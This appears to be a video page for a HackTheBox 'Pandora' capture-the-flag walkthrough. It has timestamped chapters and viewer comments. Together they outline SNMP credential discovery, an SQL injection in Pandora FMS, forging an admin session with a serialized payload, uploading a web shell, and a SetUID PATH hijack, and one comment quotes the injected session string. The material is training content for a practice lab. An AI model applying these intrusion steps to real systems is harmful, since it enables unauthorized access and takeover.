HackTheBox - Pandora
ฝัง
- เผยแพร่เมื่อ 26 มิ.ย. 2024
- 00:00 - Intro
00:58 - Start of nmap
05:10 - Using nmap to scan NMAP
07:20 - Doing a SNMPWalk talking about SNMP Mibs and how to install them, then using snmpbulkwalk to speed up the scan
09:50 - Finding all the unique fields in our SNMPWalk with grep, sort, and uniq. Which helps find fields of value
16:00 - SNMP Allowed us to view running processes on a box, a password was in the argument so we can ssh in
18:50 - SSH into the box and looking at the webserver files and configs
20:35 - Looking at Apache's config seeing there's a different site available to localhost, doing a SSH Tunnel to access it
23:20 - Finding an unauthenticated pandora fms exploit via google, playing with the injection manually
27:45 - Using SQLMap to automatically dump the database of pandora
36:45 - Testing sessions, should have used wfuzz or something to test all of these quickly
37:30 - Using the union injection to login as admin by placing a php serialized object that it expects
39:00 - With admin access to Pandora FMS we can upload a shell and get code execution
43:33 - Going over LinPEAS Results
47:30 - Finding a custom SetUID File called Pandora_Backup
49:00 - Running strings against the binary shows the tar command without an absolute path, so it is likely vulnerable to command injection, going into Ghidra to confirm
50:45 - Showing the path traversal
52:30 - The exploit didn't work because something isn't letting us do a SetUID. Digging into it
56:30 - Using SSH to log into the box and then running the exploit and seeing it works
59:25 - Showing the intended way to exploit Pandora, just finding a valid session cookie, and then a cmd injection vulnerability in ajax.php
Wow, I really thought the admin session stealing was the intended way and Pwnkit was the unintended, the more you know! Thanks for the video!
Great video as always! Would recommend the tool 'q' for writing sql queries against csv-like files/output, very powerful! Nice tip with snmpbulkwalk, I just found what I wanted in the nmap sC output and stopped there. :)
You deserve more than million subscribers 🙂❤️
Loved so much this box
Lots of love from a oscp dreamer boy from india......
💌
Love u man
Hey ipp, you've made quite some improvements in the way you present. Specially with the font size, If you can change the font to FIra Code Semi Bold the appearance will look much nicer. Moreover fonts like FIra Code, COmics Sans help people with dyslexia and astigmatism read more clear and reduce their chance of getting a head ache while watching your videos.
thanks a lot bro
That's really great video and the detail explain about the step, thanks for this video.
but I have one question about the final step in create ssh connection,
why the 'sudo -l ' can execute after ssh connect but it will failed when using php reverse shell ?
thank you .
Thanks for the content, ippsec and for sharing your knowledge with the community!
The machine was pretty straightforward. Personally, I've struggled with the inital foothold, because I've skipped the UDP scan in the enumeration phase. Finding the unauthenticated exploit / blog post the hardest part of the box imo.
Interesting! Didn't know about the unintended path via admin session stealing.
Cheers
nice
can someone help me out here - what is the significance of adding the hostname to the hostfile? could you have success just using the IP address?
why did you put "data"(id_usuario|s:5:"admin";) column in 3rd place(select 1,2,data). when sqlmap is clearly is showing it's 2nd column. Isn't it logical to follow correct column match. I struggled with it that's why asking. After matt login we can confirm that data is actually 3rd column in database, somehow sqlmap shows it in the incorrect order. Post root insights were useful for why this box was so weird.
I had the same question. If you look at sqlmap, as the information is being printed out vertically at first, it displays the columns correctly. But once they actually get printed out, sqlmap places them incorrectly. I am not sure why it happens but it could be one of those “don’t always trust automated tools”
you could try 'trial-and-error' and put the 'id_usuario|s:5:"admin";' in the first and second column you will see it gives you 'Access is not granted' .
how are you connected to pandora i cant figure out how to do this
hey ippsec, you think you could install or create something that logs all the commands you do? sometimes i like to talk about you with some of my friends and showing what commands you use can be frustrating to find. thank you
ok got my answer about ssh mode
I don't get it, can u explain? How did he get the ssh mode and which keys should I press? thx :)
you press ~ then C
@@FrancescoBellei It wasn't working for me at first. Then I entered in "ssh ~C" and pressed enter. The result was an error message: "ssh: Could not resolve hostname ~c: Name or service not known".
Immediately after that I just typed "~C" and without pressing enter, I was taken into the "ssh>" menu.
Weird and I don't know why, but it worked.
First!
05:10 - Using nmap to scan NMAP
you mean SNMP
yes it is easy box :)
ayo
usuario can be Spanish or Portuguese ;)
Excuse me. I can't find the "Pandora Room". Please send me the Room ;)
Haiio
"Easy" Box
When you dont have strings: grep -a -Eo '[[:print:]]{4,}' filename
Wawoo, blacklisted....
Please make shorter videos, 1 hr is huge 😥
yes snmp ! when printer has "Access" as "50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44,00,00,00"
thanks appsec you’re the best as always. is there a way to find 'id_usuario|s:5:"admin";' without sqlmap? since it is not allowed on the oscp.
Thank you for this and all your videos @IppSec.
I am running into problems with the public-private key usage for the user matt.
I have followed your steps multiple, but whenever I try (ssh -i matt matt@10.10.11.136) to ssh from my Kali machine to Pandora machine using the private key I created it always asks for a password.
Has anyone else ran into this problem?
Any help from anyone would be greatly appreciated.
Yes, i am facing the same problem..Even reset the machine a coupe of times but not sure why its not working...